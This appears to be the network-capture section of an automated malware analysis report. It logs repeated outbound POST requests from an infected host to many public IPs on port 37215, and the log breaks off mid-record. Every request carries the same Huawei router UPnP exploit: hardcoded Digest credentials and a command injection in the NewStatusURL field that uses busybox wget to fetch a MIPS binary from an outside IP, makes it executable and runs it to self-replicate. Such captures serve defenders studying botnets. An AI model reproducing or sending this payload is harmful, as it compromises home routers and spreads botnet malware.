                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  865192.168.2.1341910197.255.171.25537215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:16.435306072 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  866192.168.2.1340730157.194.36.5337215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:16.435494900 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  867192.168.2.1333800157.167.186.537215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:16.435555935 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  868192.168.2.134317241.204.127.13537215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:16.435909986 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  869192.168.2.1348352140.38.106.24737215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:16.435945988 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  870192.168.2.1347854197.214.157.6037215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:16.436862946 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  871192.168.2.133529241.243.87.20137215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:16.436924934 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  872192.168.2.134663679.89.114.21737215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:16.437223911 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  873192.168.2.133728049.153.65.14837215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:16.437241077 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  874192.168.2.135390841.30.236.3637215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:16.438055038 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 